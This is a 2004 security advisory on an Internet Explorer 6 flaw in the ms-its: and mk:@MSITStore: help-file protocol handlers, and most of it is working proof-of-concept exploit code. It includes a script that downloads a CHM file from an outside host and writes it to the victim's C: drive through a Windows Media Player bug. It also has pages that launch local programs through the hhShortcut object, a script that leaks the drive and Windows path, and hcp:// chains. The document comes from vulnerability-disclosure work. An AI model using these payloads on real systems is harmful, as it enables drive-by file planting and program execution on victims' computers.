advisory#2
/--------------------------------------------------------------------/
Vendor: Microsoft Corp.
product: IE.6(only tested on winXP,other products might
be vulnerable too including IE.5)
Discovery by: Roozbeh Afrasiabi (roozbeh_afrasiabi@yahoo.com)
Discovery date : NOV,2001 Reported :MAR,2004
Title: IE ms-its: and mk:@MSITStore: vulnerability
MSRC: MSRC5162mr
/--------------------------------------------------------------------/
TABLE OF CONTENTS:
==================
Description..............................................1
Solutions................................................2
PoCs.....................................................3
References...............................................4
Contact info.............................................5
Disclaimer...............................................6
1)Description:
==================
There exists a security issue with the way the ms-its(its) and mk:@MSITStore:protocol handlers become available to internet explorer after *.chm files that are functional outside help and support center are initiated using showhelp() , when this happens internet explorer is capable of accessing thosefiles using ms-its(its) or mk:@MSITStore: protocol handlers , the nature of these files makes this matter dangerous to the users . The pages that becomeavailable to IE using ms-its or mk:@MSITStore: p-handlers are only those thatof the chm file opened using showhelp() however this can be bypassed using the restriction bypass vulnerability previously reported by Arman Nayyeri.
I must point out that the ms-its: and mk:@MSITStore: protocol handlers are also available to IE when no chm file has been opened but to access these filesthe path to the target chm file must be used which is why the restriction Bypass vulnerability is possible.
Combined with other vulnerabilities that can place files on user 's system it is possible to open harmful html pages in victim 's MYcomputer zone,the fact that these two p-handlers can use the path of their target files gives the author the idea that it is also possible to run chm files from a web server in victim's internet zone in the same way by using their internet address.
(ms-its:http:\\www.exploit.com\exploit.chm::\exploit.htm).
Execution of programs is also possible but this can only be true when a chm file that imports shared.js is already open,Shared.js which is part of ntshared.chm is actually the main script used in most windows chm files,this file has a lot of functionality which can be exploited to bypass restrictions.When IE opens these files using the two p-handlers discussed they are not as restricted as a simple html file would be.Execution of programs that are shiped with the os is done using their name but it is also possible to run exe files using their path,
access to some shell folders is also possible.you can automate the execution of a program using object tag too.When programs are executed using object tag on victim's system there is no need for knowing the exact path to the executables whose MUICACHE name is fixed when such program iscalled using an object the MUICACHE is searched to find an exe with the same MUICACHE name or exe name executables like this are initiated without the need of knowing their exact path.
The following represents some of these executables and shell folders:
I)exe/s
conf.exe
notepad.exe
ntbackup.exe
spider.exe
tourstart.exe
explorer.exe
iexplore.exe
RealPlay.exe
wmplayer.exe
xmplayer.exe
hh.exe
regedit.exe
sol.exe
taskmgr.exe
winmine.exe
WScript.exe
appwiz.cpl
access.cpl
hdwwiz.cpl
nusrmgr.cpl
II)folder/s
shell:windows
shell:cookies
shell:recent
shell:system
shell:Common AppData
shell:Common Desktop
shell:Common Documents
shell:Common Favorites
shell:Common Programs
shell:Common Start Menu
shell:Common Startup
shell:Common Templates
shell:Common Administrative Tools
shell:CommonVideo
shell:CommonPictures
shell:Personal
shell:local appdata
shell:profile
shell:Administrative Tools
The fact that IE can access chm files using these two protocol handlers is due to the fact that
this software in windows OS dose not act as a simple browser , IE is capable of interacting and
responding to different protocols some of which like "shell:" , "about:" , "res:" ,.... have
previously been reported vulnerable which makes the author consider the remaining protocols
vulnerable too.
*ntshared.js is also available via iexplore.chm.
*you might want to use (iexplore.chm::/iegetsrt.htm) to have full confidance it exists .
*ms-its:D:\x.chm::\run.htm if run.htm was crafted so that it executes x.exe when it is
called using ms-its help would search d:\ to find x.exe.
*MUICACHE : HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
*for more info on shell folders take a look at my first advisory:
http://www.freewebs.com/roozbeh_afrasiabi/advisory(1).txt
2)Solutions:
==================
-Best solution
The best solution to this problem is limiting IE 's functionality to that of a simple browser which I doubt Microsoft is able of achieving in near future because most products and even the windows/OS developed by Microsoft cop. is based upon this extra functionality which makes the
situation even worse.
-Solution from author:
1)run regedit.exe
2)find the following key : HKEY_CLASSES_ROOT\PROTOCOLS\Handler
3)select any of the protocol handlers unnecessary
4)disable them by replacing "-" in front of their clsid value
*The author considers most of these protocol handlers vulnerable and it is best if users disablethose protocols they find unsafe.
[Caution]
If you have used Author's solution be aware that running chm files directly from your system after disabling it using regedit would in some cases cause instant restart.
-solution from Microsoft:
Microsoft was notified and they had one week to give me their solution but
they failed to do so. sorry mike could not wait longer.
3)Proof of concept:
===================
*download x.chm from http://www.freewebs.com/roozbeh_afrasiabi/x.chm
for testing this vulnerability.
x.chm content:
dis-info.htm
exe(0).htm:list of some programs and shell folders that can be executed
exe(1).htm:cmd
exe(2).htm:minesweeper
exe(3).htm:notepad
exe(4).htm:wordpad
exe(5).htm:cdm+dir
exe(6).htm:c:\\x.exe
exe(7).htm:Run your desired program as far as either it's path or MUICACHE name is known.
folder(1).htm:windows folder
folder(2).htm:profile folder
folder(3).htm:cookies folder
logoff.htm:on win/xp causes user logoff
vulnerable.htm
a)availability of the two p-handlers using exact path:
=========================
mk:@MSITStore:%windir%\Help\ntshared.chm::/copyright.htm
or mk:@MSITStore:%windir%\Help\ntshared.chm::copyright.htm
%windir% =location of the operating system directory
The following poc uses a vulnerability in wmplayer 8.0 to place
x.chm on victim's system.
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.freewebs.com/roozbeh_afrasiabi/x.chm",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\x.chm",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
setTimeout("x()", 8000);
}
window.open("error.aso","_media");
setTimeout("doit()", 5000);
</script>
<script language=javascript>
function x(){
//hcp://services/subsite?node=_System_/Tools_Center&topic=ms-its:c:\\x.chm::\exploit.htm
//showHelp("ms-its:c:\\x.chm::exploit.htm")
//showHelp("ms-its:addremov.chm::..\\..\\c:\\ntshared.chm::\\copyright.htm");
window.open("ms-its:c:\\x.chm::\vulnerable.htm","mywindow","location=0,status=1,scrollbars=1")
mywindow.moveTo(0,0);
}
</script>
*If you want to test this locally change "http://www.freewebs.com/roozbeh_afrasiabi/x.chm";
to file:\\location of chm file.
*for more info about the script that places the file on victim's system visit malware.com
or www.K-OTiK.Com.
The following poc was given by Arman Nayyeri for the restriction bypass vulnerability,
by changing the showhelp function to window.open you can use it as a poc to my report too:
*rename c.chm to x.wsz
<iframe src=xvulnx.wsz></iframe>
<h1>Wait For 8 Seconds...</h1>
<script>
setTimeout(
function () {
window.open("mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program
files\\winamp\\skins\\x.wsz::\winamp.htm");
//hcp://services/subsite?node=blank&topic=ms-its:c:\program files\winamp\skins\x.chm::\exe(7).htm
},
8000
);
</script>
*As seen in the above it is also possible to use hcp://services/subsite?
node=blank&topic=ms-its:c:\x.chm::\exe(7).htm if the victim system is vulnerable to hcp::// .
b)restriction bypass vulnerability
====================================
<html>
<head>
<title>Exploit</title>
<SCRIPT LANGUAGE=javascript>
function getlink(){
target=window.open("ms-its:addremov.chm::..\\..\\ntshared.chm::\\copyright.htm")
}
</script>
</head>
<body bgcolor="#FFFFFF" text="#000000" LANGUAGE="VBScript">
<b><br>Restriction Bypass Vulnerability + ms-its: p-handler
vulnerability<br></b><br>
<BUTTON TYPE=SUBMIT ID="exploit"> Exploit </BUTTON>
</body>
<SCRIPT LANGUAGE=VBSCRIPT>
Private SUB exploit_OnClick()
ON ERROR RESUME NEXT
showHelp("addremov.chm::/win_addprog_window_component.htm")
getlink()
END SUB
</SCRIPT>
c)MS-its
==================
(situation: when showhelp() is used to make these p-handlers available)
<html>
<head>
<title>Exploit</title>
<SCRIPT LANGUAGE=javascript>
function getlink(){
target=window.open("ms-its:addremov.chm::/win_addprog_install_program.htm")
}
</script>
</head>
<body bgcolor="#FFFFFF" text="#000000" LANGUAGE="VBScript">
<b><br>Internet Explorer MS-ITS protocol handler
vulnerability<br></b><br>
<BUTTON TYPE=SUBMIT ID="exploit"> Exploit </BUTTON>
</body>
<SCRIPT LANGUAGE=VBSCRIPT>
Private SUB exploit_OnClick()
ON ERROR RESUME NEXT
showHelp("addremov.chm::/win_addprog_window_component.htm")
getlink()
END SUB
</SCRIPT>
d)mk:@MSITStore
==================
(situation: when showhelp() is used to make these p-handlers available)
<html>
<head>
<title>Exploit</title>
<SCRIPT LANGUAGE=javascript>
function getlink(){
target=window.open("mk:@MSITStore:isconcepts.chm::/ismain-concepts_52.htm/")
}
</script>
</head>
<body bgcolor="#FFFFFF" text="#000000" LANGUAGE="VBScript">
<b><br>Internet Explorer mk:@MSITStore: protocol handler
vulnerability<br></b><br>
<BUTTON TYPE=SUBMIT ID="exploit"> Exploit </BUTTON>
</body>
<SCRIPT LANGUAGE=VBSCRIPT>
Private SUB exploit_OnClick()
ON ERROR RESUME NEXT
showHelp("isconcepts.chm::/ismain-concepts_52.htm")
getlink()
END SUB
</SCRIPT>
e)Either of this p-handlers allow use of files the local chm file contains *.js,*.gif,*.htm
*.css,*.xml,
=================================
ms-its:ntshared.chm::\warning.gif
ms-its:ntshared.chm::\shared.js
ms-its:ntshared.chm::\glossary.xml
ms-its:ntshared.chm::\coua.css
<img border="0" src="ms-its:ntdef.chm::/Uabrand.gif">
This can be used to test if help is running on victim's system or not.
<html>
<head>
<SCRIPT LANGUAGE="JScript">
function x(){
showHelp("filefold.chm::/windows_fcab_playall.htm");
location.reload();
}
</script>
</head>
<body>
<img border="0" src="ms-its:ntdef.chm::/Uabrand.gif" onerror=x()>
</body>
</html>
There is also the possibility of importing *.js files like shared.js:
<SCRIPT LANGUAGE="JScript" SRC="MS-ITS:ntshared.chm::/shared.js"></SCRIPT>
f)information disclosure
========================
<<html>
<head>
<title>Exploit</title>
<p><br><b>HTM help file opened in an iframe</b><br><br>
<iframe id="target" width="400" height="200" src="" name="target" scrolling="yes">
</iframe>
<SCRIPT LANGUAGE=javascript>
exec="hello"
function getlink(){
showHelp("filefold.chm::/windows_fcab_playall.htm")
target.location.href="ms-its:filefold.chm::/windows_fcab_playall.htm"
setTimeout("exploit()",4*100)
}
function exploit(){
this.focus();
loc=new String(target.moniker.substring(7,target.moniker.length));
rootdrive=loc.substring(0,3);
winloc=loc.substring(0,loc.indexOf("help"))
x.document.write("<b>root drive :</b> "+rootdrive+"<br>")
x.document.write("<b>windows folder :</b> "+winloc+"<br>")
}
</script>
</head>
<body bgcolor="#FFFFFF" text="#000000" onload=getlink()>
<p><br><b>Information disclosed:</b><br><br>
<iframe id="x" width="400" height="200" name="x" scrolling="no" align="left">
</iframe></p>
g)chm file on a web server
===========================
<html>
<title>Exploit</title>
<head>
</head>
<body bgcolor="#FFFFFF" text="#000000"
onload=javascript:document.location="ms-its:http://www.freewebs.com/roozbeh_afrasiabi/x.chm::/vulner
able.htm">
</body>
</html>
*How about banner free webpages for those who are vulnerable!!!
h)HCP://
==================
This proves the fact that other programs that use internet explorer might be vulnerable too.
hcp://services/subsite?node=blank&topic=ms-its:isconcepts.chm::/ismain-concepts_62.htm
hcp://services/subsite?node=_System_/Tools_Center&topic=ms-its:c:\\x.chm::\vulnerable.htm
I)execution of programs
======================
<html>
<title>Exploit</title>
<head>
</head>
<body bgcolor="#FFFFFF" text="#000000"
onload=javascript:document.location="ms-its:c:\\x.chm::exe(n).htm">
</body>
</html>
*"c:\\x.chm::exploitx.htm" can be replaced with http:\\www.exploit.com\x.chm::exploitx.htm
but to acheive this some changes must be made.
Links that execute programs have the following general look:
<A ID="shortcut" HREF="EXEC=@@executable_name.exe@@ CHM=ntshared.chm
FILE=@@error_file_name.htm@@">@@Shortcut text@@</A>
callShortcut a function in shared.js changes links like this into an object :
<object id='hhShortcut' type='application/x-oleobject'
classid='clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11' STYLE='display:none'>
<param name='Command' value='ShortCut'>
<param name='Window' value='error_page'>
<param name='Item1' value='NAME_OF_ExE ,LOCATION_OF_EXE\NAME.EXE'>
<param name='Item2' value='msg,1,1'></object>
This object is then inserted before the end of the htm page using insertAdjacentHTML() function.
The following would do the trick:
var __w=document.write('<object id=hhShortcut type=application/x-oleobject
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 STYLE=display:none\u003E<param name=Command
value=ShortCut\u003E<param name=Item1
value=,_executable_,,\u003E</object\u003E');hhShortcut.Click();;if(__w!=null)document.write(__w);
using hcp:// vulnerability to execute programs:
hcp://services/subsite?node=blank&topic=ms-its:c:\x.chm::\exe(2).htm
4)References:
==================
www.malware.com (wmplayer exploit code)
www.K-OTiK.Com
http://secunia.com/advisories/10523/
5)Contact Info
==================
roozbeh_afrasiabi@yahoo.com
da_stone_cold_killer@yahoo.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.1 (MingW32) - WinPT 0.7.96rc1
mQGiBEBVbGoRBACT+S7j6awJjH8ctpioGfdmQzfwxd/M5vcafFpWjYTb2g4NINfB
gzbXFANzOMDcXhmrQysvgeFl7smhFVKDl0c7dtsqvgn5pydfXRCljZwrSQAwE/PS
vSSzV7QhEI5zLWkpieyjZhlxCYtHlxma36pBx3ZpPPDfAFNpW0QBB94rxwCgoZO9
TR/YXs19bOipfffI02dv758EAILHfEHXNkb050yaU8y47JJXl64OOnQcwgNafLa4
cEyYSRYwkZUqnBX6xmB/hy8J9AnmED7tjKLSqrupJivrxueSwbNom+QN2cPpWv+i
MZXGgMLZAOrlAi4R7gGBAIq7K+Ow0Z4/FQMH3Aryw9WkBlDK7bChfLeoAXNrQAWG
kfgKA/47WQN0SAD9KSmbdMB6q8EE7sD7vYkZWIg+j4JJaWskdN7qCbSB6EBnWKQb
6gE2999nlphhmcUjS1TgjUgCLHjQ9lMIWr0Zec8NmcZyEVnEKgjHK7MkvocLpT7h
zYkVMO9HLecllYr6FrnNtWpOw/X7FVhSkNIKgNNZQ0Z3Xi3Z57RQcm9vemJlaCBh
ZnJhc2lhYmkgKHJvb3piZWhfYWZyYXNpYWJpQHlhaG9vLmNvbSkgPGRhX3N0b25l
X2NvbGRfa2lsbGVyQHlhaG9vLmNvbT6IWQQTEQIAGQUCQFVsagQLBwMCAxUCAwMW
AgECHgECF4AACgkQLh+KhhfWhDXgTwCeKAVoNkUjYqBbWu+l3WfArf4+vwkAoIjx
rBC/FnLEJDuSJ5SuLho04QtOuOsEQFVscwEHAL5OyxFo1eAwGijoPfIwQPINLuvr
bo7WVzwGmUXvvZsbLvMjc80zdUD2PaZr1kurZwqE13If+XzpNZdlFfmjtYKST+s8
8lwnzK2ososE0m4uT1MatHQxK3HNKIDRUOg7TC8PaPD+FUYntcdUYs3bdror7179
kOIfM7/ZtCQuWoqFMOZiCTd7PUSgmEXsUWoNzlNmGJmZMgSc0MtAFiGDys3sA5fK
8JyOA0rQHvmcne1Xh9P4aA9+mutSGnx/4mFPYLdDFBA5go5B0XOPrjQelxQlRAAU
xmWk0kgx+X25WRK/AAYpiEYEGBECAAYFAkBVbHMACgkQLh+KhhfWhDUH4wCfZ/83
xkEvaT1IWeaDemU5dYAysPsAnRP6Qyw1DM3gHhxl6m+bjEwPX6AG
=q+hK
-----END PGP PUBLIC KEY BLOCK-----
6)Disclaimer
==================
Roozbeh Afrasiabi is not responsible for the misuse of the information provided in this report. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this advisory. Any use ofthe information is at the user's own risk.
Especial thanks to
==================
MSRC
Members of Antionline.com
All Rights Reserved
